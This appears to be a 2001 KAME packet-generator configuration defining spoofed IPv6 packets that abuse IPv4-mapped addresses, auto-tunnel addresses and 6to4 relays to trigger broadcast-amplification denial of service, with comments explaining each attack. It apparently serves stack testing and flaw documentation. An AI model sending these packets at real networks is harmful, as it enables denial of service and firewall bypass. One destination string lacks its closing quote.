#	$KAME: transition-abuse.conf,v 1.2 2001/06/23 14:09:33 itojun Exp $

# abuse of IPv4 mapped address.  under the following conditions:
# - the victim kernel stack does not check against IPv4 mapped address on
#   IPv6 native packet
# - the victim node runs udp echo service (inetd) on AF_INET6 socket
# the victim node can generate IPv4 broadcast responses mistakenly,
# leading to DoS.  the example tries to attack inside the firewall from outside
# (works nicer when 9.0.0.1 is an IPv4 firewall).
#
# this example works extremely well since udp packet format is common to IPv4
# and IPv6, therefore, the broadcast response will call for more responses.
#	attacker -> victim: from ::ffff:10.255.255.255 to ::ffff:9.0.0.1
#	victim -> broadcast: from 9.0.0.1 (or some other addr) to 10.255.255.255
#	more response: from many guys to 9.0.0.1 (or some other addr)
#
# RFC2553 does NOT comment on this case.  also, if the victim node tries to
# support SIIT document, the kernel stack is unable to filter out the packet.

v4mapped:\
	:ip6-v4mapped:udp1:
ip6-v4mapped:\
        :ip6_flow#0:ip6_plen=auto:ip6_nxt=auto:ip6_hlim#255:\
        :ip6_src="::ffff:10.255.255.255":\
	:ip6_dst="::ffff:9.0.0.1":
udp1:\
	:udp_sport#7:udp_dport#7:

# abuse of IPv4 compatible address (auto tunnel).  under the following
# conditions:
# - the victim kernel stack supports auto tunnel
# the victim node will generate IPv4 broadcast responses, leading to DoS.
# the example tries to attack inside the firewall from outside
# (works nicer when 9.0.0.1 is an IPv4 firewall).
#
# with other IPv6 source address, bad guys can attack other IPv4 victim nodes
# anonymously.
#
# RFC2883 has a comment on this case.

v4compat:\
	:ip6-v4compat:icmp6echo:
ip6-v4compat:\
        :ip6_flow#0:ip6_plen=auto:ip6_nxt=auto:ip6_hlim#255:\
        :ip6_src="::10.255.255.255":\
	:ip6_dst="::9.0.0.1:
icmp6echo:\
        :icmp6_type=echo:icmp6_code#0:icmp6_cksum=auto:icmp6_id#0:\
	:icmp6_seq#0:

# abuse of 6to4.  under the following conditions:
# - the victim node is configured as an 6to4 relay
# the victim node will generate IPv4 broadcast responses, leading to DoS.
#
# with other IPv6 source address, bad guys can attack other IPv4 victim nodes
# anonymously.
#
# 6to4 RFC has a comment on this case.

stf:\
	:ip6-stf:icmp6echo:
ip6-stf:\
        :ip6_flow#0:ip6_plen=auto:ip6_nxt=auto:ip6_hlim#255:\
        :ip6_src="2002:0aff:ffff::1":\
	:ip6_dst="2001:0900:0001::1":
